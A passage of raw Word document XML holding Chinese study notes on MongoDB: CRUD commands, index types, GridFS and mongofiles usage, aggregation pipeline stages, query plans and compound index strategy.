        <w:t>操作有三个命令：insert,insertOne,insertMany</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nsert可以插入一个Document或者Array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InsertOne只能插入一条Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InsertMany可以插入一个Array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作最简单的命令是find，输入条件可以查询所有数据.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其次还有findAndModify，由此引申出findOneAndDelete,findOneAndUpdate,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>findOneAndReplace，这些操作实现了一系列事务操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作有四个命令：update，updateOne，updateMany和修改行数插入命令类似。</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eplaceOne和findOneAndReplace类似。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作有三个命令：remote，deleteOne，deleteMany</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emote可以删除一行或多行，deleteOne只能删除一行，deleteMany可以删除多行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>索引操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB中所多种类型的索引：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单键索引： Single Field Index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复合索引： Compound Index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式文件系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB内置一套文件系统名为GridFS（Grid File System）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以使用它来存储大于16M的文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它具有多机器存储备份，可以突破一般文件系统对file的限制，分段存储，不像普通file system是整个存储的。这样读取大型文件时就不会占用大量的内存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持多种驱动，如Java，C#等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GridFS会将文件存储在两个Document里：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>hunks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来存储二进制数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>iles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于存储基本文件信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体的命令我们可以参考以下链接：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.mongodb.com/manual/reference/program/mongofiles/index.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>https://docs.mongodb.com/manual/reference/program/mongofiles/index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中最简单的包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储文件：mongofiles </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d &lt;database&gt; put &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">删除文件：mongofiles </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d &lt;database&gt; delete &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取文件：mongofiles </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d &lt;database&gt; -l &lt;new_filename&gt; get &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用的命令还有：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--host &lt;hostname&gt;&lt;:port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--port &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>聚合操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB中有一个聚合工具：Aggregate，类似于SQL语句中的Group By。聚合工具可以让开发人员直接使用MongoDB的原生的命令操作数据库中的数据，并按要求进行聚合，聚合大幅提高了开发效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Aggregate PipeLine指的是命令将会按照顺序依次执行，并且管道操作可以重复，它的工作原理如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w: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6bf3ddafgw1f02gpxkzbcj20l40f7wgs.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3799205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ggreagte是一个数组，其中包含多个对象（命令），通过遍历PipeLine数组对Collection中数据的操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以调用一下的阶段（stages）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$lookup：相当于左外连接，它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$lookup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rom:&lt;外联接的集合 &gt;,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>localField:&lt;连接的列名&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>foreignField:&lt;外联接的列名&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>as:&lt;输出的列名&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$match：相当于过滤条件，它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{ $match :{&lt;query&gt;}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$group：可以分组来计算出结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$group:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_id:&lt;expressing&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;field1&gt;:{&lt;accumulator1&gt;:&lt;expression1&gt;},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体解释：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xpression：我们可以使用“$属性名”或“$属性名.属性名</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.”来表示一个字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ccumulator：累计运算符有很多中，常见的有$avg,$first,$last,$max,$min,$sum等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$project：标记要显示的列名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$project:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_id:0 or 1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;field&gt;:0 or 1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Aggreagte pipeLine的优势包括：可以对超过BSON限制（16M）的数据进行处理，2可以分片。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询计划(Query Plan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以使用db.Collection.explain()来查看查询计划，它可以为我们制定优化方案提供支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每次我们查询时都会生成一个查询计划，下次再查询时，系统会优先考虑之前缓存下来的查询计划。具体步骤如图所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3013710" cy="5732780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要注意的是查询计划会在重启或关闭时清空。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引创建策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果查询只查询单个键，只需建立单键索引即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果查询要支持多种条件，则需要建立复合索引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>{ "category": 1, "item": 1 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以用： category做前缀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以用：category + item</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>千万不要： item + category 这种模式。。。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
